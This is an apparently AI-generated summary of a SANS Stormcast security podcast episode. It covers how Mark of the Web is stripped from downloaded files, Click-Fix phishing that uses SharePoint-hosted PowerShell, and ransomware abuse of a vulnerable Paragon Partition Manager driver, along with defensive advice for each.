SANS Stormcast Tuesday Mar 4th: Mark of the Web Details; Sharepint and Click-Fix Phishing; Paragon Partionmanager BYOVD Exploit

Episode Overview

Podcast: SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)
Host: Johannes B. Ullrich
Episode Date: March 4, 2025
Episode Theme:
A concise briefing on current cybersecurity issues including new developments with “Mark of the Web” on Windows, a novel “Click-Fix” phishing attack utilizing SharePoint, and a kernel-level driver exploit used by ransomware actors in Paragon Partition Manager.

Key Discussion Points & Insights

1. Mark of the Web – Deep Dive & Limitations

[00:36 - 02:20]

Background: “Mark of the Web” (MotW) marks files downloaded from the Internet. This is so Windows prompts a security warning if the user tries to execute such files.
- Implemented as a NTFS alternate data stream (ADS) that holds zone information (zone identifiers 1-4).
Propagation Issues:
- MotW is not always maintained when files are moved using different archiving, extraction, and image utilities.
  - Example: ZIP extraction, ISO images can strip MotW (“didn't get properly propagated to different file formats…” [00:19]).
Technical Details:
- ADS contains zone info and sometimes the original download URL and referral details.
- Incognito/private browser modes may suppress some obtainable information to avoid privacy leakage.
Practical Tip/Hack:
- The alternate data stream can be inspected easily using Notepad by specifying it as part of the filename.
- Quote: “...the little hack how you look at the content of the Mark of the Web at that alternative data stream just in Notepad...” (Johannes, [01:35])
Notable Insights:
- Implementation inconsistencies pose challenges for security teams relying on MotW for defense-in-depth.

2. Click-Fix Phishing via SharePoint and HTML Attachments

[02:20 - 03:53]

Attack Vector:
- Recently observed phishing uses HTML attachments in emails, which is becoming more prevalent (“something that I've actually seen more and more recently...” [02:32]).
- This method is termed “Click-Fix” by Fortinet researchers.
Attack Flow:
- User opens the HTML, sees a fake error message instructing them to copy-paste code (typically PowerShell) into their system.
- No executable code in the HTML itself (e.g., no JavaScript), so gateway defenses often miss it.
- The malicious payload is fetched from a SharePoint site operated by attackers, using Microsoft's Graph API.
Unique Aspects:
- Exploits user behavior—users unwittingly run malicious code as directed.
- Use of SharePoint/Graph API makes detection harder, as these are trusted business tools:
  - Quote: “all the interaction with SharePoint of course may not necessarily trigger alerts because that's usually considered a valid business resource...” (Johannes, [03:30])
Impact/Risk:
- Increased risk due to users bypassing traditional technical safeguards.
- Defender difficulty in filtering/blocking legitimate business platform usage.

3. Paragon Partition Manager BYOVD (Bring Your Own Vulnerable Driver) Exploit

[03:53 - 05:13]

Vulnerability:
- Vulnerable kernel driver distributed with Paragon Partition Manager prior to version 2 has multiple vulnerabilities.
- Now actively exploited by ransomware groups for privilege escalation.
Seriousness:
- It’s a kernel-level, digitally signed driver—grants attackers high-level system access.
- Exploitable even if user never manually installed the software; attackers can “bring their own vulnerable driver.”
  - Quote: “This is even a problem if you never installed this software because Nethacker may install that driver for you and then use it for privilege escalation.” (Johannes, [04:15])
Mitigations:
- Microsoft added the driver to its vulnerable driver block list.
- Reliability of this block list has been called into question in the past.
  - Quote: “But there have been issues with that vulnerable private block list in the past, so not sure how well this works these days.” (Johannes, [04:53])
- Suggested to add custom signatures to security solutions to outright block or detect old driver versions.
Advice:
- Urgent: Upgrade software if in use, monitor for driver presence even if not using Paragon Partition Manager.

Notable Quotes & Memorable Moments

“The purpose of the Mark of the Web is to indicate to the system that this file has been downloaded from the Internet, so the user can be presented with a warning if this file is executable...” (Johannes, [00:24])
“Yes, users will do this. The user here doesn't really realize what they're doing, of course, and that will execute then a PowerShell script that installs additional malware.” (Johannes, [02:47])
“The user here essentially exploits themselves by copy-pasting that PowerShell script.” (Johannes, [03:19])
“So first of all, yes, you should update Paragon Partition Manager if you run it, but this is even a problem if you never installed this software because Nethacker may install that driver for you and then use it for privilege escalation.” (Johannes, [04:12])

Key Timestamps

00:36 — Introduction to Mark of the Web, propagation problems
01:35 — Inspecting the alternate data stream in Notepad
02:20 — Fortinet’s “Click-Fix” phishing campaign overview
02:47 — User exploitation via PowerShell copy-paste
03:30 — SharePoint and Graph API’s role; evasion of defenses
03:53 — Paragon Partition Manager’s vulnerable driver explained
04:12 — Drivers can be introduced even if software isn’t installed
04:53 — Microsoft block list caveats and upgrade recommendations

Tone

Technical, to-the-point, with moments of practical advice and warnings for defenders; Johannes maintains a direct and informative delivery style suitable for security professionals.

Episode Overview

Key Discussion Points & Insights

1. Mark of the Web – Deep Dive & Limitations

[00:36 - 02:20]

Background: “Mark of the Web” (MotW) marks files downloaded from the Internet. This is so Windows prompts a security warning if the user tries to execute such files.
- Implemented as a NTFS alternate data stream (ADS) that holds zone information (zone identifiers 1-4).
Propagation Issues:
- MotW is not always maintained when files are moved using different archiving, extraction, and image utilities.
  - Example: ZIP extraction, ISO images can strip MotW (“didn't get properly propagated to different file formats…” [00:19]).
Technical Details:
- ADS contains zone info and sometimes the original download URL and referral details.
- Incognito/private browser modes may suppress some obtainable information to avoid privacy leakage.
Practical Tip/Hack:
- The alternate data stream can be inspected easily using Notepad by specifying it as part of the filename.
- Quote: “...the little hack how you look at the content of the Mark of the Web at that alternative data stream just in Notepad...” (Johannes, [01:35])
Notable Insights:
- Implementation inconsistencies pose challenges for security teams relying on MotW for defense-in-depth.

2. Click-Fix Phishing via SharePoint and HTML Attachments

[02:20 - 03:53]

Attack Vector:
- Recently observed phishing uses HTML attachments in emails, which is becoming more prevalent (“something that I've actually seen more and more recently...” [02:32]).
- This method is termed “Click-Fix” by Fortinet researchers.
Attack Flow:
- User opens the HTML, sees a fake error message instructing them to copy-paste code (typically PowerShell) into their system.
- No executable code in the HTML itself (e.g., no JavaScript), so gateway defenses often miss it.
- The malicious payload is fetched from a SharePoint site operated by attackers, using Microsoft's Graph API.
Unique Aspects:
- Exploits user behavior—users unwittingly run malicious code as directed.
- Use of SharePoint/Graph API makes detection harder, as these are trusted business tools:
  - Quote: “all the interaction with SharePoint of course may not necessarily trigger alerts because that's usually considered a valid business resource...” (Johannes, [03:30])
Impact/Risk:
- Increased risk due to users bypassing traditional technical safeguards.
- Defender difficulty in filtering/blocking legitimate business platform usage.

3. Paragon Partition Manager BYOVD (Bring Your Own Vulnerable Driver) Exploit

[03:53 - 05:13]

Vulnerability:
- Vulnerable kernel driver distributed with Paragon Partition Manager prior to version 2 has multiple vulnerabilities.
- Now actively exploited by ransomware groups for privilege escalation.
Seriousness:
- It’s a kernel-level, digitally signed driver—grants attackers high-level system access.
- Exploitable even if user never manually installed the software; attackers can “bring their own vulnerable driver.”
  - Quote: “This is even a problem if you never installed this software because Nethacker may install that driver for you and then use it for privilege escalation.” (Johannes, [04:15])
Mitigations:
- Microsoft added the driver to its vulnerable driver block list.
- Reliability of this block list has been called into question in the past.
  - Quote: “But there have been issues with that vulnerable private block list in the past, so not sure how well this works these days.” (Johannes, [04:53])
- Suggested to add custom signatures to security solutions to outright block or detect old driver versions.
Advice:
- Urgent: Upgrade software if in use, monitor for driver presence even if not using Paragon Partition Manager.

Notable Quotes & Memorable Moments

“The purpose of the Mark of the Web is to indicate to the system that this file has been downloaded from the Internet, so the user can be presented with a warning if this file is executable...” (Johannes, [00:24])
“Yes, users will do this. The user here doesn't really realize what they're doing, of course, and that will execute then a PowerShell script that installs additional malware.” (Johannes, [02:47])
“The user here essentially exploits themselves by copy-pasting that PowerShell script.” (Johannes, [03:19])
“So first of all, yes, you should update Paragon Partition Manager if you run it, but this is even a problem if you never installed this software because Nethacker may install that driver for you and then use it for privilege escalation.” (Johannes, [04:12])

Key Timestamps

00:36 — Introduction to Mark of the Web, propagation problems
01:35 — Inspecting the alternate data stream in Notepad
02:20 — Fortinet’s “Click-Fix” phishing campaign overview
02:47 — User exploitation via PowerShell copy-paste
03:30 — SharePoint and Graph API’s role; evasion of defenses
03:53 — Paragon Partition Manager’s vulnerable driver explained
04:12 — Drivers can be introduced even if software isn’t installed
04:53 — Microsoft block list caveats and upgrade recommendations

Tone

Technical, to-the-point, with moments of practical advice and warnings for defenders; Johannes maintains a direct and informative delivery style suitable for security professionals.

wavePod

Powered by Wave AI

Summary

Episode Overview

Key Discussion Points & Insights

1. Mark of the Web – Deep Dive & Limitations

2. Click-Fix Phishing via SharePoint and HTML Attachments

3. Paragon Partition Manager BYOVD (Bring Your Own Vulnerable Driver) Exploit

Notable Quotes & Memorable Moments

Key Timestamps

Tone

Summary

Episode Overview

Key Discussion Points & Insights

1. Mark of the Web – Deep Dive & Limitations

2. Click-Fix Phishing via SharePoint and HTML Attachments

3. Paragon Partition Manager BYOVD (Bring Your Own Vulnerable Driver) Exploit

Notable Quotes & Memorable Moments

Key Timestamps

Tone